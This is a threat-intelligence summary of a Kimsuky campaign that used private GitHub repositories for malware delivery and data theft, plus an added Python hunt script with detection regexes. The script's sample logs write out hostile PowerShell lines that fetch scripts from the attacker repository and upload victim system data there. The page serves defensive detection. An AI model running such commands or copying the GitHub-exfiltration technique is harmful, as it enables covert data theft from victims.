Signs of the Kimsuky Group's GitHub-Based Malware Distribution and Information Theft
2025-09-09 • S2W • Kimsuky Group's GitHub-Based Malware Distribution and Information Theft Activity
S2W TALON reported Kimsuky activity in which the North Korea-backed group used private GitHub repositories as its delivery, script-management and exfiltration infrastructure. The chain begins with a ZIP archive containing an LNK file disguised as an electronic tax invoice. Opening the LNK executes PowerShell, which fetches a decoy document and malicious scripts from hxxps://github[.]com/God0808RAMA/group_0721/, authenticating to the private repository with a GitHub token hardcoded in the script. The PowerShell chain drops MicrosoftEdgeUpdate.ps1 under %AppData% and registers a scheduled task named BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}, a name chosen to pass as a legitimate BitLocker policy job, that runs temporary.ps1 every 30 minutes. The downloaded scripts collect the host's IP address, OS and hardware details, install date, running processes and boot time, then upload the resulting logs to attacker-controlled GitHub folders named ntxBill_{MMdd_HHmm}, so each victim's data lands in a timestamped directory of the repository. The hardcoded token also gave investigators a lead: they tied it to nine private repositories and to the email address sahiwalsuzuki4[@]gmail.com. The case illustrates the operational risk of trusted-platform abuse: PowerShell traffic to github.com blends with legitimate developer activity, so detection has to key on the lookalike task name, the dropped script names, and PowerShell processes sending authenticated GitHub API requests from hosts that have no reason to do so.
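The indicators above can be turned into host-log hunt rules. The following is an added example written for this page, not S2W's code or anything recovered from the samples: it scans flattened event lines (constructed here to resemble Sysmon process-create/file-create events, a Security 4698 task-creation event and a PowerShell 4104 script-block event) for the repository path, the BitLocker-lookalike task name, the two dropped script names, the ntxBill_{MMdd_HHmm} upload directory, and PowerShell making GitHub API calls with an Authorization header. The log field layout, the token placeholder and the assumption that the Authorization header is passed as `token` or `Bearer` are mine; the GUID suffix of the task name is matched loosely on the assumption that variants may use a different value.

```python
"""Hunt rules for the Kimsuky GitHub-delivery chain described above (added example, not S2W's code)."""
import re
from dataclasses import dataclass

# Indicators taken from the report text. The Authorization header form and the
# loose GUID match in the task name are assumptions made for this example.
REPO_PATH = re.compile(r"God0808RAMA/group_0721", re.I)
TASK_NAME = re.compile(r"BitLocker MDM policy Refresh\{[0-9A-Z-]+\}", re.I)
DROPPED_PS1 = re.compile(r"(?<![\w.])(MicrosoftEdgeUpdate|temporary)\.ps1\b", re.I)
EXFIL_DIR = re.compile(r"ntxBill_\d{4}_\d{4}")
# PowerShell (or its web cmdlets) talking to github.com with a hardcoded token header.
PS_TO_GITHUB = re.compile(r"(powershell|pwsh|Invoke-RestMethod|Invoke-WebRequest|\biwr\b).*github\.com", re.I)
GH_TOKEN_HDR = re.compile(r"Authorization\W{0,3}(token|Bearer)\s+\S+", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    excerpt: str


def scan(lines):
    """Return one Finding per (rule, line) hit, in rule order within each line."""
    findings = []
    for n, line in enumerate(lines, start=1):
        hits = []
        if REPO_PATH.search(line):
            hits.append("kimsuky_repo_path")
        if TASK_NAME.search(line):
            hits.append("bitlocker_lookalike_task")
        if DROPPED_PS1.search(line):
            hits.append("dropped_ps1_name")
        if EXFIL_DIR.search(line):
            hits.append("ntxbill_exfil_dir")
        # Low-fidelity on its own (developers use GitHub too), so require both halves.
        if PS_TO_GITHUB.search(line) and GH_TOKEN_HDR.search(line):
            hits.append("powershell_github_hardcoded_token")
        findings.extend(Finding(rule, n, line[:80]) for rule in hits)
    return findings


# Constructed sample events; field layout is illustrative, not any real product's format.
SAMPLE_LOGS = [
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -w hidden -c iwr https://api.github.com/repos/God0808RAMA/group_0721/contents/ -Headers @{Authorization='token REDACTED_TOKEN'}",
    r"EventID=11 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename=C:\Users\victim\AppData\Roaming\MicrosoftEdgeUpdate.ps1",
    r"EventID=4698 TaskName=\BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00} Trigger=PT30M Action=powershell.exe -File temporary.ps1",
    r"EventID=4104 ScriptBlockText=Invoke-RestMethod -Method PUT -Uri https://api.github.com/repos/God0808RAMA/group_0721/contents/ntxBill_0721_1530/sysinfo.txt -Headers @{Authorization='token REDACTED_TOKEN'}",
    # Benign: PowerShell fetching a public release without any token header.
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -c iwr https://github.com/PowerShell/PowerShell/releases/latest",
    # Benign: an ordinary git client.
    r"EventID=1 Image=C:\Program Files\Git\cmd\git.exe CommandLine=git pull origin main",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.rule}: {f.excerpt}")
```

The two benign lines show why the GitHub-traffic rule is gated on the token header: PowerShell reaching github.com is normal on developer hosts, and only the combination with an inline credential (or the repository path and ntxBill_ directory, which are specific to this campaign) is worth an alert. In a real pipeline the repository path and task GUID should be treated as campaign-specific IOCs that will rotate, while the dropped script names and the authenticated-PowerShell-to-GitHub pattern are the more durable signals.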